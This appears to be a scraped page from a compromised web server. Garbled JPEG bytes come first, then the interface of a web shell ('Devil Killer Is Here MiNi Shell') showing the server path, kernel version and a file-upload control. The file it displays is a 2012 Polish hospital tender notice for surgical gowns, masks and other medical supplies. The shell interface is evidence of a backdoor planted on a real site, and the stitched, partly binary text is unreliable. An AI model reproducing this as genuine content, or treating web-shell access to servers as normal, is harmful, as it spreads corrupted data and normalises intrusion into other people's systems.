JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121214/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121214/512252-N-2012.html

<p class="kh_header"><b>Bartoszyce: Dostawa wyrobów z włókniny i innych artykułów medycznych</b><br>
<b>Numer ogłoszenia: 512252 - 2012; data zamieszczenia: 14.12.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Powiatowy im. Jana Pawła II , ul. Kardynała Stefana Wyszyńskiego 11, 11-200 Bartoszyce, woj. warmińsko-mazurskie, tel. 089 7642625, 7649484, faks 089 7642625.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital-bartoszyce.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa wyrobów z włókniny i innych artykułów medycznych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia składa się z 50 zadań:
Zadanie nr 01	Sterylny fartuch chirurgiczny, standardowy
Zadanie nr 02	Sterylny fartuch chirurgiczny
Zadanie nr 03	Maska chirurgiczna trójwarstwowa, pełnobarierowa
Zadanie nr 04	Maska chirurgiczna trójwarstwowa, pełnobarierowa
Zadanie nr 05	Maska chirurgiczna czterowarstwowa
Zadanie nr 06	Półmaska filtrująca
Zadanie nr 07	Sterylne obłożenie do przezcewkowych zabiegów urologicznych
Zadanie nr 08	Ubranie chirurgiczne
Zadanie nr 09	Sterylny zestaw do operacji biodra
Zadanie nr 10	Sterylny zestaw do operacji kolana
Zadanie nr 11	Zestaw do operacji uniwersalny
Zadanie nr 12	Sterylna serweta  do zabiegów na dłoni/stopie
Zadanie nr 13	Sterylny zestaw do artroskopii barku
Zadanie nr 14	Sterylna serweta z wycięciem U
Zadanie nr 15	Sterylny zestaw do chirurgii odbytnicy
Zadanie nr 16	Sterylna serweta chirurgiczna trójwarstwowa
Zadanie nr 17	Sterylna serweta chirurgiczna, dwuwarstwowa
Zadanie nr 18	Sterylna serweta chirurgiczna trójwarstwowa
Zadanie nr 19	Sterylna ściereczka chłonna
Zadanie nr 20	Sterylny pokrowiec foliowy na przewody
Zadanie nr 21	Sterylna kieszeń samoprzylepna
Zadanie nr 22	Gąbka samoprzylepna, sterylna
Zadanie nr 23	Sterylna osłona na stolik Mayo
Zadanie nr 24	Sterylny rzep
Zadanie nr 25	Sterylna osłona na aparaturę
Zadanie nr 26	Sterylna samoprzylepna kieszeń
Zadanie nr 27	Prześcieradło bibułowo-foliowe
Zadanie nr 28	Sterylna, transparentna folia do obłożenia pola operacyjnego
Zadanie nr 29	Sterylny worek samoprzylepny
Zadanie nr 30	Sterylna serweta z włókniny
Zadanie nr 31	Sterylna serweta dwuwarstwowa
Zadanie nr 32	Pościel z włókniny
Zadanie nr 33	Opatrunki przylepne
Zadanie nr 34	Plastry
Zadanie nr 35	Maski tlenowe
Zadanie nr 36	Materiały medyczne
Zadanie nr 37	Maski tlenowe
Zadanie nr 38	Maski tlenowe
Zadanie nr 39	Maski tlenowe
Zadanie nr 40	Zestawy medyczne
Zadanie nr 41	Dreny
Zadanie nr 42	Przyrządy używane na salach operacyjnych
Zadanie nr 43	Przyrządy używane na salach operacyjnych
Zadanie nr 44	Przyrządy używane na salach operacyjnych
Zadanie nr 45	Przyrządy używane na salach operacyjnych
Zadanie nr 46	Zaciski, szwy, podwiązki naczyniowe
Zadanie nr 47	Zaciski, szwy, podwiązki naczyniowe
Zadanie nr 48	Zaciski, szwy, podwiązki naczyniowe
Zadanie nr 49	Zaciski, szwy, podwiązki naczyniowe
Zadanie nr 50	Zaciski, szwy, podwiązki naczyniowe.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-3, 33.14.11.11-1, 33.14.11.12-8, 33.15.71.10-9, 33.14.00.00-3, 33.14.16.20-2, 33.14.16.40-8, 33.16.22.00-5, 33.14.11.20-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 50.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek, jeżeli złoży wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dwóch dostaw w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat licząc od dnia złożenia oferty, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy zostały wykonane lub są wykonywane należycie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek, jeżeli złoży opłaconą polisę, a w przypadku jej braku inny dokumentu potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Dla zadań od numeru 01 do 32
G.1) Oświadczenie Wykonawcy o posiadaniu dokumentów potwierdzających dopuszczenie oferowanych wyrobów medycznych do obrotu zgodnie z obowiązującymi przepisami /certyfikaty, deklaracje zgodności / i o niezwłocznym przedstawieniu ich na wezwanie Zamawiającego
G.2) opis, specyfikację oferowanego przedmiotu zamówienia (foldery, karty katalogowe, ulotki, prospekty w języku polskim ze zdjęciami, z zaznaczeniem którego pakietu i której pozycji dotyczy) zawierające opis podstawowych parametrów, zgodny z opisem przedmiotu zamówienia
G.3) Próbki wyrobów opatrzonych etykietami zawierającymi wszystkie niezbędne dla wyrobów medycznych dane w celu dokonania weryfikacji zgodności zaoferowanych produktów z opisem przedmiotu zamówienia (po jednej sztuce do każdej pozycji, dla zadania 03 jedno opakowanie) gotowe do użycia w warunkach szpitalnych (do zadań od 01 do 03).
Próbki należy umieścić w oddzielnej od Oferty, odpowiednio zabezpieczonej paczce. Paczkę należy opisać w sposób umożliwiający identyfikację Wykonawcy, tj. nazwa i adres Wykonawcy. Paczka dodatkowo winna być opisana:
próbki do przetargu nr 33/2012 .
Każda próbka musi być oznaczona w następujący sposób:
nazwa Wykonawcy, Nr zadania, Nr pozycji.

Dla zadań od numeru 33 do 34
G.4) Oświadczenie Wykonawcy o posiadaniu katalogów oferowanych produktów i przedstawieniu ich na wezwanie Zamawiającego
G.5) Oświadczenie Wykonawcy o posiadaniu dokumentów potwierdzających dopuszczenie oferowanych wyrobów medycznych do obrotu zgodnie z obowiązującymi przepisami (certyfikaty, deklaracje zgodności  CE producenta potwierdzające zgodność wyrobu z wymaganiami dyrektyw Unii Europejskiej, potwierdzenie zgłoszenia do Rejestru Wytwórców i Wyrobów Medycznych) i o niezwłocznym przedstawieniu ich na wezwanie Zamawiającego 
G.6) Próbki wyrobów opatrzonych etykietami zawierającymi wszystkie niezbędne dla wyrobów medycznych dane w celu dokonania weryfikacji zgodności zaoferowanych produktów z opisem przedmiotu zamówienia (po jednej sztuce do każdej pozycji) gotowe do użycia w warunkach szpitalnych 
Próbki należy umieścić w oddzielnej od Oferty, odpowiednio zabezpieczonej paczce. Paczkę należy opisać w sposób umożliwiający identyfikację Wykonawcy, tj. nazwa i adres Wykonawcy. Paczka dodatkowo winna być opisana:
próbki do przetargu nr 33/2012 
Każda próbka musi być oznaczona w następujący sposób:
nazwa Wykonawcy, Nr zadania, Nr pozycji.

Dla zadań od numeru 35 do 41
G.7) Oświadczenie Wykonawcy o posiadaniu katalogów oferowanych produktów i przedstawieniu ich na wezwanie Zamawiającego
G.8) Oświadczenie Wykonawcy o posiadaniu dokumentów potwierdzających dopuszczenie oferowanych wyrobów medycznych do obrotu zgodnie z obowiązującymi przepisami (certyfikaty, deklaracje zgodności  CE producenta potwierdzające zgodność wyrobu z wymaganiami dyrektyw Unii Europejskiej, potwierdzenie zgłoszenia do Rejestru Wytwórców i Wyrobów Medycznych) i o niezwłocznym przedstawieniu ich na wezwanie Zamawiającego  
G.9) Próbki wyrobów opatrzonych etykietami zawierającymi wszystkie niezbędne dla wyrobów medycznych dane w celu dokonania weryfikacji zgodności zaoferowanych produktów z opisem przedmiotu zamówienia ( po jednej sztuce do każdej pozycji) gotowe do użycia w warunkach szpitalnych (do zadań od 35 do 40).
Próbki należy umieścić w oddzielnej od Oferty, odpowiednio zabezpieczonej paczce. Paczkę należy opisać w sposób umożliwiający identyfikację Wykonawcy, tj. nazwa i adres Wykonawcy. Paczka dodatkowo winna być opisana: próbki do przetargu nr 33/2012
Każda próbka musi być oznaczona w następujący sposób:
nazwa Wykonawcy, Nr zadania, Nr pozycji.

Dla zadań od numeru 42 do 45
G.10) Oświadczenie Wykonawcy o posiadaniu dokumentów potwierdzających dopuszczenie oferowanych wyrobów medycznych do obrotu zgodnie z obowiązującymi przepisami /certyfikaty, deklaracje zgodności . 
G.11) opis, specyfikację oferowanego przedmiotu zamówienia (foldery, karty katalogowe, ulotki
prospekty w języku polskim ze zdjęciami, z zaznaczeniem którego pakietu i której pozycji dotyczy) zawierające opis podstawowych parametrów, zgodny z opisem przedmiotu zamówienia oraz sposób użycia oferowanych produktów 

dla zadań od numeru 46 do 50: 
G.12) Certyfikat CE i deklarację zgodności oferowanego produktu
G.13) Opis, specyfikację oferowanego przedmiotu zamówienia (foldery, karty katalogowe, ulotki prospekty w języku polskim ze zdjęciami, z zaznaczeniem którego pakietu i której pozycji dotyczy) zawierające opis podstawowych parametrów, zgodny z opisem przedmiotu zamówienia oraz sposób użycia oferowanych produktów</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>A.1) Formularz ofertowy - wypełniony i podpisany przez wykonawcę A.2) Dokumenty potwierdzające posiadanie uprawnień / pełnomocnictw osób składających ofertę, o ile nie wynikają z przepisów prawa lub z przedstawionych dokumentów rejestrowych. A.3) Formularze cenowe w zakresie wybranych przez wykonawcę zadań od 1 do 50 - wypełnione i podpisane przez wykonawcę</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Przewiduje się następujące możliwości zmiany umowy polegające na: a) zmianie formy organizacyjno-prawnej stron, nazwy, siedziby lub podmiotów reprezentujących pod warunkiem, że pod względem prawnym nie prowadzą one do zmian stron umowy, b) zmianie obowiązującej stawki VAT w przypadku zmiany przepisów podatkowych c) obniżeniu przez Wykonawcę cen asortymentu będącego przedmiotem umowy d) wydłużeniu okresu obowiązywania umowy zgodnie z zapisem w §8 punkt 5.2 umowy 2.W przypadku zakończenia produkcji lub wycofania z rynku wyrobu będącego przedmiotem zamówienia dopuszcza się zmianę na nowy produkt o tych samych bądź lepszych parametrach po cenie jednostkowej zaoferowanej w ofercie. 3. Wszelkie zmiany i uzupełnienia treści umownej wymagają formy pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital-bartoszyce.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziba zamawiającego pok A 14.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.12.2012 godzina 11:00, miejsce: Szpital Powiatowy im. Jana Pawła II ul. Wyszyńskiego 11 11-200 Bartoszyce Sekretariat..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Sterylny fartuch chirurgiczny, standardowy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sterylny fartuch chirurgiczny, standardowy - 4 100 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Sterylny fartuch chirurgiczny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sterylny fartuch chirurgiczny - 3500 szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Maska chirurgiczna trójwarstwowa, pełnobarierowa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Maska chirurgiczna trójwarstwowa, pełnobarierowa - 380 opakowań po 50 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Maska chirurgiczna trójwarstwowa, pełnobarierowa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Maska chirurgiczna trójwarstwowa, pełnobarierowa - 600 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Maska chirurgiczna czterowarstwowa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Maska chirurgiczna czterowarstwowa -25 szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Półmaska filtrująca.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Półmaska filtrująca - 20 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Sterylne obłożenie do przezcewkowych zabiegów urologicznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sterylne obłożenie do przezcewkowych zabiegów urologicznych -130 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Ubranie chirurgiczne.</p>
